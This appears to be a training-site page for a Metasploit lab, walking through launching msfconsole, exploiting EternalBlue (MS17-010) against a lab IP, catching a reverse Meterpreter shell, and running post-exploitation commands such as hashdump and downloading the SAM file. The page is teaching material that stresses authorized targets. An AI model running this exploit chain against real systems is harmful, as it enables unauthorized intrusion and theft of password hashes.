LOADING SCENARIO...
← All Labs OverviewCommands HintsSolution
Hacky CTF /tools / Metasploit
Exploitation Advanced CEH · OSCP · CPENT · PNPT

Metasploit The World's Most Used Exploitation Framework

Develop, test, and execute exploits against vulnerable targets. Metasploit provides hundreds of pre-built exploit modules, payloads, and post-exploitation tools for complete penetration testing.

⏱ 90 min ★ 4.7 rating ✓ 1,923 completions 🏷 Exploitation
▶ Start Lab Get Hints Get Certified
Lab Details
ToolMetasploit
DifficultyAdvanced
Duration90 min
CategoryExploitation
Points200 pts
CertsCEH · OSCP · CPENT · PNPT
CostFREE
Start Lab →
No signup · No VM · Browser-based
Overview Commands Hints Threat Intel Solution
What is Metasploit?
Tool overview and real-world usage

The Metasploit Framework is an open-source penetration testing tool that makes hacking simple. It provides a complete toolkit for exploit development, delivery, and post-exploitation — all within a unified console interface (msfconsole).

Metasploit is used by penetration testers, SOC analysts, red teams, and security researchers worldwide. It is a core tool requirement for certifications including CEH · OSCP · CPENT · PNPT.

Navigating msfconsole and basic commands
Searching and selecting exploit modules
Configuring payloads (meterpreter, shell)
Setting RHOSTS, LHOST, LPORT options
Exploiting a vulnerable target (MS17-010)
Post-exploitation: hashdump, sysinfo, upload
Step-by-Step Commands
Follow each step in order
01
Start msfconsole
Launch the Metasploit Framework console
bash
sudo msfconsole
Starting msfconsole initializes the database and loads all modules. Use -q flag for quiet startup. Takes 10-30 seconds on first run.
02
Search for exploit
Find the EternalBlue (MS17-010) exploit module
bash
search ms17-010
Searches all module names, descriptions, and CVEs. Use "search type:exploit platform:windows" to narrow results. Look at Rank column — "excellent" is most reliable.
03
Use and configure
Select the exploit and set target options
bash
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set LHOST 192.168.1.5 show options
"use" loads the module. "show options" displays required settings. RHOSTS = target IP. LHOST = your IP (for reverse shell). LPORT = port your listener uses.
04
Run the exploit
Execute the exploit and catch a shell
bash
run # or exploit -j
"run" executes in foreground. "-j" runs as background job (better for multiple targets). If successful, you get a Meterpreter session: meterpreter >
05
Post-exploitation
Gather information from the compromised system
bash
sysinfo getuid hashdump download SAM shell
sysinfo = system information. getuid = current user. hashdump = dump Windows password hashes. download = exfiltrate files. shell = drop to system shell. Escalate to SYSTEM if needed.
Lab Hints
Click to reveal hints one at a time
Hint 1
Always work in an authorized environment. Never use Metasploit on networks or systems you do not have explicit written permission to test.
Hint 2
Save all your output and notes as you go. Penetration test reports require evidence — screenshots, command output, and timestamps. Use tee or output redirection to capture everything.
Hint 3
If something fails, check your network connectivity first. Then verify you have the correct target IP. Then check if a firewall or IDS is blocking your attempts.
Hint 4
Practice on intentionally vulnerable machines: TryHackMe, HackTheBox, VulnHub, or DVWA. These are legal targets designed for learning. Never practice on real targets without permission.
Live Threat Intelligence
Lookup any IP or CVE from your findings
GeoIP Lookup
Enter a target IP to geolocate.
CVE Lookup
Try: CVE-2021-44228 (Log4Shell)
Lab Solution
Attempt the lab first before revealing
Quick Reference
sudo msfconsole
search ms17-010
use exploit/windows/smb/ms17_0
run
sysinfo
Get Certified
CEHOSCPCPENTPNPT All Courses →
Community
Join Discord Join Telegram View Workshops
What to Learn Next

Related Labs